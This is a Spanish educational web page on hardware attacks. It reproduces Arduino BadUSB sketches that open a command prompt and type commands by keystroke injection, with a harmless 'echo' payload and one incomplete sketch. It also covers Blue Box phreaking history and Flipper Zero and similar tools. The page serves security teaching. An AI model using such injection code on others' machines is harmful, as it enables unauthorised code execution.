INB COMPUTERS "Honestidad, calidad y profesionalismo"

Hardware Attack

POSTED ON: 27 mayo, 2025. ACTUALIZADO: 5 mayo, 2026.

USB Attack

Autodesk, Inc. (s.f.). A BadUSB Device With Arduino [Imagen]. https://www.instructables.com/A-BadUSB-Device-With-Arduino/

BADUSB

CODIGO POR: https://www.instructables.com/A-BadUSB-Device-With-Arduino/

Un agradecimiento especial por esta demostración a mi alumno Axel E. Jimenez P.

Descargo de responsabilidad

El autor se reserva el derecho de no ser responsable de cualquier daño o su acción ilegal causada por el uso de este instructable. Sin embargo, puede utilizarlo en su propio hardware bajo su propio riesgo. Los ejemplos de este instructable también pueden ser útiles para fines educativos para desarrollar habilidades de alfabetización digital y discutir los conceptos de pentesting y hacking ético.

Dispositivos USB HID

El acrónimo HDI significa Human Interface Device. Esta clase de dispositivos incluye teclados, ratones y otros controladores. A veces un dispositivo no es lo que parece. Por ejemplo, esta memoria USB es en realidad una placa de desarrollo compatible con Arduino con microcontrolador ATmega32U4.

Paso 1: El bueno The Good

#include <Keyboard.h>

void setup() {

Keyboard.begin();

//I recommend that you leave a short delay before start while prototyping.

//It will will give you some time to reprogram a board before it starts typing.

delay(30000);

Keyboard.println("Your_password");

}

void loop() {

}

Paso 2: El malo The bad

//a command line to execute

const char command [] = "echo hello hackers";

void setup() {

Keyboard.begin();

//I recommend that you leave a short delay before start while prototyping.

//It will will give you some time to reprogram a board before it starts typing.

delay(30000);

}

void loop() {

//Pressing Win+r shortcut

Keyboard.press(KEY_LEFT_GUI);

Keyboard.press('r');

delay(KEY_DELAY);

Keyboard.releaseAll();

delay(KEY_DELAY*5);

//Inputting cmd command

Keyboard.println("cmd");

delay(KEY_DELAY*5);//A delay to ensure that cmd window has been started

//Typing the command

Keyboard.println(command);

delay(30000);

}

Paso 3: Lo feo The Ugly

#include <Keyboard.h>

#include <string.h>

//numpad keycodes

#define KEYPAD1 225

#define KEYPAD2 226

#define KEYPAD3 227

#define KEYPAD4 228

#define KEYPAD5 229

#define KEYPAD6 230

#define KEYPAD7 231

#define KEYPAD8 232

#define KEYPAD9 233

#define KEYPAD0 234

#define KEY_DELAY 50

//numpad keycodes array

const char keypad[] = {KEYPAD0, KEYPAD1, KEYPAD2, KEYPAD3, KEYPAD4,

KEYPAD5, KEYPAD6, KEYPAD7, KEYPAD8, KEYPAD9};

//a command line to execute

const char command [] = "echo hello hackers";

void setup() {

Keyboard.begin();

//I recommend that you leave a short delay before start while prototyping.

//It will will give you some time to reprogram a board before it starts typing.

delay(30000);

}

//A function to input one character by its Alt-code

void printAltChar(char c)

{

//Splitting the Alt-code into three digits

char digits[] = {0,0,0};

digits[0] = c/100;

digits[1] = (c / 10) % 10;

digits[2] = c % 10;

//Pushing Alt

Keyboard.press(KEY_LEFT_ALT);

delay(KEY_DELAY);

char i = 0;

//Skip leading zeros

while (!digits[i])

i++;

//Inputting the digits

for (; i < 3; i++)

{

Keyboard.press(keypad[digits[i]]);

delay(KEY_DELAY);

Keyboard.release(keypad[digits[i]]);

delay(KEY_DELAY);

}

Keyboard.releaseAll();

}

void loop() {

//Pressing Win+r shortcut

Keyboard.press(KEY_LEFT_GUI);

Keyboard.press('r');

delay(KEY_DELAY);

Keyboard.releaseAll();

//Inputting ‘cmd’ command

printAltChar(99);

printAltChar(109);

printAltChar(100);

Keyboard.press(KEY_RETURN);

delay(KEY_DELAY);

Keyboard.releaseAll();

delay(KEY_DELAY*5);//A delay to ensure that cmd window has been started

//Typing the command

for (int i = 0; i<strlen(command); i++)

printAltChar(command[i]);

Keyboard.press(KEY_RETURN);

delay(KEY_DELAY);

Keyboard.releaseAll();

delay(KEY_DELAY);

delay(30000);

}

Autodesk, Inc. (s.f.). A BadUSB Device With Arduino. https://www.instructables.com/A-BadUSB-Device-With-Arduino/

Blue Box

Blue Box (Steve Jobs y Steve Wozniak)

WEB: https://www.apple.com/stevejobs/

PLATAFORMA: Dispositivo electrónico analógico/digital de telefonía

LICENCIA: No comercial originalmente; dispositivo experimental/hacker histórico

DESARROLLADORES: Steve Wozniak y Steve Jobs

AÑO: 1971–1972 aprox.

La Blue Box es considerada un antecedente directo de la cultura hacker moderna y de la ingeniería inversa aplicada a sistemas de telecomunicaciones. Demostró que infraestructuras complejas podían analizarse y manipularse mediante comprensión técnica profunda de protocolos y señalización.

Línea del tiempo

1960s – Phone Phreaking: Exploración de redes telefónicas analógicas mediante tonos.
1971 – Steve Wozniak diseña Blue Box: Basada en investigaciones sobre señalización telefónica.
1972 – Jobs y Wozniak comercializan Blue Box: Venta informal entre estudiantes y entusiastas.
1976 – Fundación de Apple Computer: Experiencia previa con Blue Box influye en visión tecnológica y empresarial.

Desde una perspectiva académica, este episodio marcó la convergencia entre:

Electrónica digital
Telecomunicaciones
Ingeniería inversa
Cultura hacker temprana
Seguridad de infraestructuras críticas

Steve Jobs reconoció posteriormente que sin la experiencia de la Blue Box probablemente Apple no habría existido, ya que el proyecto mostró a ambos fundadores que podían diseñar y comercializar tecnología avanzada.

Funcionamiento técnico

La Blue Box operaba generando tonos específicos de frecuencia utilizados por las centrales telefónicas analógicas para controlar llamadas de larga distancia.

Principios técnicos:

Uso de señalización multifrecuencia (MF signaling)
Generación del tono clave de 2600 Hz
Manipulación de canales “in-band”
Simulación de comandos internos de conmutación telefónica
Protocolos y tecnologías relacionadas
In-band signaling
Multifrequency signaling (MF)
PSTN (Public Switched Telephone Network)
Phone Phreaking
Sistemas de conmutación analógica Bell System

Isaacson, W. (2011). Steve Jobs. Simon & Schuster.Wozniak, S., & Smith, G. (2006). iWoz: Computer geek to cult icon. W. W. Norton & Company.

Flipper Zero

Flipper Devices Inc. (2026). Flipper Zero [Imagen]. https://flipper.net/products/flipper-zero

Flipper Zero

COMPRA: https://flipper.net/products/flipper-zero https://es.aliexpress.com/item/1005008300673226.html

WEB: https://flipper.net/

PLATAFORMA: Dispositivo portátil multiprotocolo para análisis y pruebas de seguridad

LICENCIA: Hardware/Open Source parcialmente abierto (firmware y comunidad)

FABRICANTE: Flipper Devices

AÑO DE LANZAMIENTO: 2020 (Kickstarter) – comercialización global posterior

Flipper Zero es un dispositivo portátil orientado al análisis, exploración y pruebas de seguridad sobre sistemas electrónicos y protocolos inalámbricos de corto alcance. Popularmente denominado “el Tamagotchi para hackers”, combina múltiples interfaces de comunicación en un equipo compacto diseñado para investigación en ciberseguridad, radiofrecuencia (RF), RFID, NFC, infrarrojo y sistemas embebidos.

El dispositivo integra un microcontrolador ARM y diversos módulos de comunicación que permiten interactuar con tecnologías comúnmente utilizadas en controles remotos, tarjetas de acceso, dispositivos IoT y sistemas de automatización. Su diseño se inspira en herramientas de pentesting y hardware hacking, pero con una interfaz simplificada y orientada al aprendizaje práctico.

Desde una perspectiva educativa, Flipper Zero se ha convertido en una plataforma relevante para enseñanza de:

Ciberseguridad aplicada
Ingeniería inversa
Protocolos inalámbricos
Sistemas embebidos
Radiofrecuencia y RFID
Seguridad física y electrónica

Características técnicas principales

Microcontrolador ARM Cortex-M
Pantalla LCD monocromática integrada
GPIO para interacción con hardware externo
Comunicación USB-C
Emulación de dispositivos RF y RFID
Batería recargable integrada
Firmware actualizable y extensible

Tecnologías y protocolos soportados

RF y sub-GHz
315 MHz
433 MHz
868 MHz
915 MHz

RFID

RFID 125 kHz
EM4100
HID Prox
NFC
NFC-A
MIFARE Classic
ISO14443
Infrarrojo
IR Remote Control
Protocolos de controles remotos IR

Comunicación y hardware

GPIO
UART
SPI
I2C
USB HID

Línea del tiempo

2020 – Lanzamiento en Kickstarter: Proyecto financiado masivamente por la comunidad hacker y maker.
2021 – Distribución internacional: Popularización en comunidades de hardware hacking y pentesting.
2022 – Expansión firmware y comunidad open source: Desarrollo de plugins y firmware personalizados.
2023–2024 – Restricciones y debates regulatorios: Algunos países y plataformas restringen su comercialización debido a preocupaciones sobre uso indebido.

Aplicaciones académicas y profesionales

Laboratorios de pentesting físico
Enseñanza de protocolos inalámbricos
Investigación de seguridad IoT
Ingeniería inversa de dispositivos RF
Análisis de sistemas RFID/NFC
Automatización y electrónica experimental

DF MAS. (2024). Flipper Zero: el Tamagotchi para hackers. https://www.df.cl/df-mas/tecno/flipper-zero-el-tamagotchi-para-hackers Flipper Devices. (2024). Flipper Zero official documentation. https://flipperzero.one/

Otras tecnologías hardware

Talking Sasquach (30 nov, 2025). I Tested High Boy Against Flipper Zero - Here's What I Found [Video]. Youtube. https://youtu.be/Val_14lzjrA

Alternativas a Flipper Zero

Proxmark3: El estándar del sector para el análisis, la piratería y la clonación de RFID y NFC, que ofrece funciones más avanzadas que Flipper en este ámbito.

HackRF One (con PortaPack): una potente radio definida por software (SDR) que cubre un amplio rango de frecuencias (de 1 MHz a 6 GHz) para la recepción y transmisión de señales de radio.

High Boy: un dispositivo de código abierto del tamaño de un iPod, diseñado para Wi-Fi, Sub-GHz, NFC, IR y Bluetooth, que cuenta con una pantalla a color.

Placas M5Stack / LilyGo: En concreto, la Cardputer o la T-Embed con firmware como Bruce o Marauder ofrecen una alternativa más económica y personalizable para tareas de Wi-Fi y Bluetooth.

Pwnagotchi: una herramienta basada en inteligencia artificial y que funciona con Raspberry Pi, diseñada específicamente para probar la seguridad de las redes Wi-Fi.

Kode Dot: un dispositivo diseñado para competir con el Flipper Zero, que cuenta con una pantalla táctil AMOLED a todo color y prestaciones similares.